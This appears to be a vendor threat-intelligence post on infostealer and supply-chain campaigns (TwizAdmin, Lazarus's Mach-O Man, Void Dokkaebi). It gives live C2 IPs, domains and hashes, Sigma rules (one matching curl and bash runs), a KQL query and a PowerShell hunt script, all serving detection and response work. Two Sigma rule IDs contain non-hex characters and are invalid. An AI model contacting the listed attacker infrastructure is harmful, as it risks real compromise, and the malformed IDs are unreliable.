Back to Intelligence

TwizAdmin, Mach-O Man & Void Dokkaebi: Multi-Platform Infostealer Surge & Supply Chain Attacks — OTX Pulse Analysis

SA
Security Arsenal Team
April 23, 2026
6 min read

Threat Summary

Recent OTX pulses indicate a convergence of state-sponsored activity and Cybercrime-as-a-Service (CaaS) targeting credential stores and cryptocurrency assets. We are observing active campaigns from Lazarus Group (Mach-O Man), Void Dokkaebi (supply chain), and the DataBreachPlus actor (TwizAdmin). These adversaries have shifted focus to multi-platform payloads (Windows/macOS), utilizing social engineering vectors like "ClickFix" fake CAPTCHAs and fake job interviews to bypass traditional perimeter defenses. The primary objective is systematic credential harvesting from browsers, development environments, and crypto wallets to enable financial theft and lateral movement.

Threat Actor / Malware Profile

TwizAdmin (DataBreachPlus)

  • Type: MaaS (Malware-as-a-Service).
  • Malware: TwizAdmin (Clipper/Stealer), crpx0 (Ransomware).
  • Behavior: Multi-stage attack featuring a FastAPI-based C2 panel. It hijacks clipboards for 8 crypto chains, steals BIP-39 seed phrases, and exfiltrates browser data. Includes a ransomware module for extortion if monetization fails.
  • Distribution: Phishing lures impersonating logistics (FedEx) and software delivery.

Mach-O Man (Lazarus Group)

  • Type: APT / Espionage.
  • Malware: PyLangGhostRAT, Mach-O Man loader.
  • Behavior: Targets macOS users via "ClickFix". Uses fake meeting invitations (Zoom/Teams) delivered via Telegram. Tricks users into running terminal commands that download and execute payloads. Exfiltrates data via Telegram.
  • Persistence: Uses LaunchAgents and script modification to survive reboots.

Void Dokkaebi (Famous Chollima)

  • Type: Supply Chain / Dev-targeted.
  • Malware: DEV#POPPER RAT, InvisibleFerret, OmniStealer.
  • Behavior: Poisons public Git repositories using fake job interviews as the lure. Exploits VS Code workspace trust to execute malicious tasks upon cloning the repo. Self-propagating via Git history tampering.

StepDrainer

  • Type: Web3 MaaS.
  • Behavior: Smart contract drainer abusing ERC-20 permissions and NFT approval mechanisms. Delivered via phishing sites mimicking blockchain scanners.

IOC Analysis

The provided indicators reveal a hybrid infrastructure strategy:

  • C2 Infrastructure: IPs like 103.241.66[.]238 (TwizAdmin) and 166.88.4.2 (Void Dokkaebi) serve as direct command and control nodes.
  • Delivery Infrastructure: Numerous domains utilizing .xyz (e.g., fanonlyatn[.]xyz) and .fun TLDs (e.g., bull-run[.]fun) host the malicious payloads or act as redirectors for ClickFix campaigns.
  • Payloads: A mix of SHA256 and MD5 hashes corresponding to Mach-O binaries (macOS), Python scripts (PyLangGhostRAT), and Windows loaders.
  • Operationalization: SOC teams should immediately block the listed IPs and domains at the perimeter. File hashes should be uploaded to EDR threat feeds for retrospective hunting. Note the use of non-standard ports (e.g., 1337) for C2 communication.

Detection Engineering

YAML
title: Potential macOS ClickFix Fake Meeting Invite
id: 7a2c9d1e-8f3b-4c1d-a0e5-9b2c3d4e5f6a
status: experimental
description: Detects potential execution of malicious scripts triggered by fake meeting invites or ClickFix campaigns targeting macOS.
references:
    - https://otx.alienvault.com/pulse/66279a0f1d0d0a5f0c5b1b1b
author: Security Arsenal Research
date: 2026/04/24
modified: 2026/04/24
logsource:
    category: process_creation
    product: macos
detection:
    selection:
        Image|endswith:
            - '/osascript'
            - '/bash'
            - '/sh'
            - '/curl'
        CommandLine|contains:
            - 'meeting'
            - 'teams'
            - 'zoom'
            - 'googlemeet'
    condition: selection
falsepositives:
    - Legitimate user executing meeting scripts (rare)
level: high
tags:
    - attack.execution
    - attack.t1059.004
---
title: Suspicious VS Code Git Repository Execution
id: 8b3d0e2f-9g4c-5d2e-b1f6-0c3d4e5f6g7a
status: experimental
description: Detects potential supply chain attack via malicious VS Code tasks or Git repository execution associated with Void Dokkaebi.
references:
    - https://otx.alienvault.com/pulse/66266e5c1d0d0a5f0c5b1b1a
author: Security Arsenal Research
date: 2026/04/24
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\Code.exe'
            - '\git.exe'
    selection_child:
        Image|endswith:
            - '\node.exe'
            - '\python.exe'
            - '\powershell.exe'
            - '\cmd.exe'
    selection_network:
        DestinationIp|contains:
            - '23.27.'
            - '154.91.'
            - '166.88.'
    condition: all of selection_*
falsepositives:
    - Legitimate developer building projects from known internal repos
level: high
tags:
    - attack.initial_access
    - attack.t1195.002
---
title: TwizAdmin C2 Network Traffic
id: 9c4e1f3g-0h5d-6e3f-c2g7-1d4e5f6g7h8a
status: experimental
description: Detects network connections to known TwizAdmin C2 infrastructure and associated IP ranges.
references:
    - https://otx.alienvault.com/pulse/66263d581d0d0a5f0c5b1b19
author: Security Arsenal Research
date: 2026/04/24
logsource:
    category: network_connection
detection:
    selection:
        DestinationIp:
            - '103.241.66.238'
            - '31.31.198.206'
            - '85.239.62.36'
        DestinationPort:
            - 1337
    condition: selection
falsepositives:
    - None
level: critical
tags:
    - attack.command_and_control
    - attack.t1071.001


kql
// Hunt for Void Dokkaebi and TwizAdmin Infrastructure Connections
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in~ ("fanonlyatn.xyz", "bull-run.fun", "spot-wave.fun", "livemicrosft.com", "moonscan.live", "scanclaw.live") 
   or RemoteIP in ("103.241.66.238", "31.31.198.206", "166.88.4.2", "85.239.62.36", "23.27.20.143", "172.94.9.250")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| order by Timestamp desc


powershell
# IOC Hunt Script for TwizAdmin and Mach-O Man File Hashes
$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9",
    "e12285f507c847b986233991b86b22e3", # MD5
    "7fd19c564761e2c8c9b583cf30db810e313417c7d3572f637f8cedf4d2cc1e91"
)

$SearchPaths = @("C:\Users\*\Downloads\", "C:\Temp\", "C:\ProgramData\", "C:\Users\*\AppData\Local\Temp\")

Write-Host "Scanning for malicious file hashes associated with TwizAdmin and Mach-O Man..." -ForegroundColor Yellow

foreach ($Path in $SearchPaths) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $FileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($TargetHashes -contains $FileHash) {
                Write-Host "[ALERT] Malicious file found: $($_.FullName)" -ForegroundColor Red
            }
            
            # Check MD5 for specific indicator
            if ($_.Name -like "*.js" -or $_.Name -like "*.exe" -or $_.Name -like "*.dmg") {
                 $MD5Hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
                 if ($TargetHashes -contains $MD5Hash) {
                    Write-Host "[ALERT] Malicious file found (MD5): $($_.FullName)" -ForegroundColor Red
                 }
            }
        }
    }
}

# Check for active network connections to C2 IPs
$C2IPs = @("103.241.66.238", "166.88.4.2", "172.94.9.250")
$Connections = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue
foreach ($Conn in $Connections) {
    $RemoteIP = ($Conn.RemoteAddress).ToString()
    if ($C2IPs -contains $RemoteIP) {
        $Process = Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue
        Write-Host "[ALERT] Active C2 connection detected to $RemoteIP by process: $($Process.ProcessName)" -ForegroundColor Red
    }
}

Response Priorities

Immediate

  • Block IOCs: Implement blocks on all listed IPs (TwizAdmin, Void Dokkaebi) and domains (fanonlyatn, bull-run, livemicrosft) on firewalls and secure web gateways.
  • Hunt for Execution: Run the provided PowerShell script across endpoints to detect dropped payloads. specifically look for Mach-O binaries on macOS and .exe/.js files in Windows temp folders matching the hashes.
  • Quarantine: Isolate any devices showing signs of connection to 103.241.66[.]238 or 166.88.4.2.

24 Hours

  • Credential Reset: If credential theft is suspected (based on infostealer presence), force a password reset for affected users and revoke session tokens.
  • Developer Hygiene: Audit developer workstations for unauthorized git clones or VS Code extensions. Revoke SSH keys that may have been stolen by OmniStealer/BeaverTail.
  • Crypto Wallet Audit: Verify integrity of blockchain infrastructure wallets for signs of approval abuse (StepDrainer/TwizAdmin).

1 Week

  • Application Control: Implement strict code signing policies for macOS devices to prevent execution of unsigned Mach-O binaries.
  • Supply Chain Vetting: Review policies regarding third-party code repositories and job recruitment processes to mitigate Void Dokkaebi-style attacks.
  • Hardening: Enforce browser extension allowlisting to counter the extension-stealing capabilities of these infostealers.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsinfostealertwizadminmach-o-manlazarus-groupsupply-chain-attack

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action